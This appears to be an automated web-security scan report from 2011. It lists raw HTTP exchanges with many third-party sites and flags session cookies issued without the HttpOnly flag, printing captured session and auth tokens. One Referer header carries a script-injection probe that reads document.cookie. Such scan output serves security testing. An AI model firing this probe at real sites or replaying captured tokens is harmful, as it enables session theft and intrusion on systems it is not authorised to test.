GET /files.php?name=Nslookup HTTP/1.1 Host: www.filetransit.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!doctype html public "-//w3c//dtd html 4.0 transitional//en"> <html> <head> <title>Nslookup Software - NSLookup, Atelier Web Security Port Scanner, DNS Thing ...</title> <meta http-equiv="Con ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.folkd.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.foxitsoftware.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gabbr.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.gpg.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:06:39 GMT Server: Apache Set-Cookie: SESS4f8b8e940bd1b5592aec2833218c244b=juq455no7avf4ohoeb33ho2n46; expires=Tue, 01-Mar-2011 01:39:59 GMT; path=/; domain=.gpg.org Last-Modified: Sat, 05 Feb 2011 22:06:39 GMT ETag: "92cf80f6e0d2cd5989936c5e23a89fff" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 12735
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.hemidemi.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:14 GMT Server: Mongrel 1.1.3 Status: 200 OK Cache-Control: no-cache Content-Type: text/html; charset=utf-8 Content-Length: 3576 Set-Cookie: _session_id=66b150e6e745bd9b2dff53708f727cc0; path=/ Vary: Accept-Encoding Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.jamespot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /techdirect/ HTTP/1.1 Host: www.jazdtech.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:01:52 GMT Set-Cookie: JazdSession="a60b5303-7988-48d1-88b3-467a83635a2c:1297008112717"; Version=1; Max-Age=3600; Expires=Sun, 06-Feb-2011 17:01:52 GMT; Path=/ Set-Cookie: JazdTestCookie=1297008112717; Expires=Mon, 06-Feb-2012 16:01:52 GMT; Path=/ Set-Cookie: JSESSIONID=90039B3D2C4BBD4CB6E1E02847F77216; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en Connection: close Content-Length: 74356
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <META name= ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /techdirect/content/download.htm?contentSetId=60049707&contentId=60056832&contentSetTypeId=10&pageTypeId=1 HTTP/1.1 Host: www.jazdtech.com Proxy-Connection: keep-alive Referer: http://www.jazdtech.com/techdirect/?decf1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E28f30fa12ca=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: JazdSession="3b4eea85-b138-4e6f-b7b9-9e0d90c2cf6d:1297008537536"; JazdTestCookie=1297008537536; JSESSIONID=F90B4442ACCB72FBEA93BBB1A2A1DEC7
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.jumptags.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=b0m32fe8ia2aj602f1o1q5f1r7; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.linkatopia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:39:02 GMT Server: Apache X-Powered-By: PHP/5.2.12 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: PHPSESSID=b0m32fe8ia2aj602f1o1q5f1r7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Connection: close Content-Type: text/html Content-Length: 15274
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Linka ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID="ajax:6164122648378833163"; Version=1; Path=/ P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Set-Cookie: leo_auth_token="GST:ZTkdLLKZK_ggZRbY44T2FKTN6Eo_M0OV49kqXrkZrEol8AbriE_Vxr:1296946948:e68b5644f2e89cdd8b8600193a537cd5b3bca0ac"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:27 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Set-Cookie: bcookie="v=1&141e3dd9-2a20-4c3c-827f-21d17cd03532"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:35 GMT; Path=/ Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: lang="v=2&lang=en"; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Content-Language: en-US Date: Sat, 05 Feb 2011 23:02:28 GMT Content-Length: 19987
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /companies/222438/OwnerIQ HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:ZQgw03ZYfQ00azc_JSdCZKQJd4K6alIZMZdC0MUYURk89UEZXdolwx:1296946949:65fdca8a090beb3f900ea530a9bab4f648ed93f8"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 23:32:29 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:4713947493888160893"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: bcookie="v=1&e6f1aaac-08d7-4426-85cc-9b3490cae2cf"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 02:16:37 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 23:02:30 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 23:32:45 GMT;path=/;httponly Content-Length: 26660
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /groupInvitation HTTP/1.1 Host: www.linkedin.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE" Expires: 0 Pragma: no-cache Cache-control: no-cache, must-revalidate, max-age=0 Set-Cookie: leo_auth_token="GST:USPcjVjh_OtiRy9WPlG0jPNXb0WyphkShZD0e7Nn60hypyfO-0CmKk:1296943603:1f5c383a1a62947997acc0a50d1873ded2a84670"; Version=1; Max-Age=1799; Expires=Sat, 05-Feb-2011 22:36:42 GMT; Path=/ Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: JSESSIONID="ajax:3497768082988792158"; Version=1; Path=/ Set-Cookie: visit=G; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: bcookie="v=1&cd6dbf47-e6cf-4898-9bbd-b3e4bc5d6192"; Version=1; Domain=linkedin.com; Max-Age=2147483647; Expires=Fri, 24-Feb-2079 01:20:50 GMT; Path=/ Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sat, 05 Feb 2011 22:06:42 GMT Set-Cookie: NSC_MC_QH_MFP=ffffffffaf19965b45525d5f4f58455e445a4a42198c;expires=Sat, 05-Feb-2011 22:36:58 GMT;path=/;httponly Content-Length: 12878
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=965ts4g3qv9nm1g1ubp8p7k021; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.lovely-faces.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 20:35:01 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: private, max-age=900, pre-check=900 Set-Cookie: PHPSESSID=965ts4g3qv9nm1g1ubp8p7k021; path=/ Last-Modified: Sat, 05 Feb 2011 09:23:34 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 30751
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=U ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /privacy.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tc.html HTTP/1.1 Host: www.manualsonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __gads=ID=9c79886a0efcbf70:T=1296942810:S=ALNI_MZT5moPrMV1QActIQk7lQFHgvu6Ig; adsur=58; memSessionId=59308638-3172-11e0-bdbb-0030485f67c6; adsust=n2; adsus=2jh81Z;
The following cookie was issued by the application and does not have the HttpOnly flag set:
PHPSESSID=dri464g5lu2kq9c1sqpg1v3c16; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directory/draw_list_prize_bond_draw_result_7500.html HTTP/1.1 Host: www.merapakistan.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:07:04 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=dri464g5lu2kq9c1sqpg1v3c16; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html Content-Length: 35028
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.migrationexpertzone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mindbodygreen.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=2808EAD77051D7744363EB0876447148; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Sat, 05 Feb 2011 23:02:40 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The following cookie was issued by the application and does not have the HttpOnly flag set:
wongsess=e90cffbaa0823899fb24df43be3f65dd; expires=Wed, 06 Feb 2036 05:02:44 GMT; path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mister-wong.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:44 GMT Server: Apache Set-Cookie: wongsess=e90cffbaa0823899fb24df43be3f65dd; expires=Wed, 06 Feb 2036 05:02:44 GMT; path=/ P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Length: 7516 Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.mylinkvault.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:48 GMT Server: Apache X-Powered-By: PHP/5.2.15 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Language: en Set-Cookie: PHPSESSID=os9t2670j382p7k3kipnt47et6; path=/; domain=.mylinkvault.com Vary: Accept-Encoding Content-Length: 12638 Connection: close Content-Type: text/html; charset=utf-8
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.myspace.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.netlog.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and does not have the HttpOnly flag set:
JSESSIONID=0000jQb9DKl__HTGjPUMmqXLC4O:-1; Path=/
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.netvouz.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:02:52 GMT Server: IBM_HTTP_Server P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR NOR UNI COM NAV" Set-Cookie: JSESSIONID=0000jQb9DKl__HTGjPUMmqXLC4O:-1; Path=/ Expires: Thu, 01 Dec 1994 16:00:00 GMT Cache-Control: no-cache="set-cookie, set-cookie2" Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html; charset=UTF-8 Content-Language: en-US Content-Length: 20206
<?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www. ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oandp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:06:38 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 40048 Content-Type: text/html; Charset=windows-1252 Expires: Sat, 05 Feb 2011 22:05:38 GMT Set-Cookie: ASPSESSIONIDCQSQQCTS=MNHFLLNCGGABOKOGOBCCPICA; path=/ Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET / HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Date: Sat, 05 Feb 2011 22:39:46 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID=0000hgPPLoHv4btY2S4F68ZL1i_:13ddq0t8b; Path=/
Set-Cookie: jsession_unique_id=1296945586525; Expires=Sun, 06 Feb 2011 00:09:46 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:39:46 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=hgPPLoHv4btY2S4F68ZL1i_; Expires=Mon, 07 Mar 2011 22:39:46 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
Content-Length: 87491
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html class="nojs" xmlns="http://www.w3.org/1999/xhtml" x ...[SNIP]...
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /promo/list5.do HTTP/1.1 Host: www.officedepot.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Pragma: No-cache
Cache-Control: no-cache,no-store,max-age=0
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="ALL DEVa TAIa OUR BUS UNI NAV STA PRE" policyref="http://www.officedepot.com/w3c/p3p.xml"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Sat, 05 Feb 2011 22:40:01 GMT
Content-Length: 6309
Connection: close
Set-Cookie: JSESSIONID=0000N7JB0IDdbJzrbHY1HCK2e8j:13ddq0uth; Path=/
Set-Cookie: jsession_unique_id=1296945606192; Expires=Sun, 06 Feb 2011 00:10:06 GMT; Path=/
Set-Cookie: CU_BRAND=OD; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/
Set-Cookie: IBSD_LOCALE=en_US; Expires=Tue, 31 Jan 2012 22:40:06 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/
Set-Cookie: CID_CART_COOKIE=N7JB0IDdbJzrbHY1HCK2e8j; Expires=Mon, 07 Mar 2011 22:40:06 GMT; Path=/
Set-Cookie: cae_browser=desktop; path=/; domain=.officedepot.com
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /content/information-security/ HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /service/software-distribution/software-distribution HTTP/1.1 Host: www.oit.gatech.edu Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:07:12 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.10 ZendServer/4.0 Set-Cookie: SESS701e63468b7538f49a91969758042315=m62ul61cvi1ckhdg53u2dh1e65; expires=Tue, 01-Mar-2011 01:40:32 GMT; path=/; domain=.oit.gatech.edu Last-Modified: Sat, 05 Feb 2011 09:15:23 GMT ETag: "b0c4a17612c3bdb20d870d94e5608032" Expires: Sun, 19 Nov 1978 05:00:00 GMT Cache-Control: must-revalidate Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 13613
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.oneview.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Sat, 05 Feb 2011 23:02:58 GMT Set-Cookie: JSESSIONID=22619842C67867F5B1EE74469F963957; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding X-Cache: MISS from squid.oneview.de X-Cache-Lookup: MISS from squid.oneview.de:80 Via: 1.0 squid.oneview.de:80 (squid/2.6.STABLE21) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd" > <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="de-DE" lang="de-DE">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/gpl-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: www.opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /nslookup.html HTTP/1.1
Host: www.orthougm.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /default.asp?promoCode=987-78 HTTP/1.1 Host: www.othawaii.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Sat, 05 Feb 2011 22:09:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 7135
Content-Type: text/html
Set-Cookie: promoCode=987%2D78; path=/
Set-Cookie: ASPSESSIONIDCADDSQTB=PNOPIINCCOHAAGBEKJOCEMNK; path=/
Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Site Name: Orthopedics Today Hawaii 2012 Developed By: A. Magona ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: www.pdfforge.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
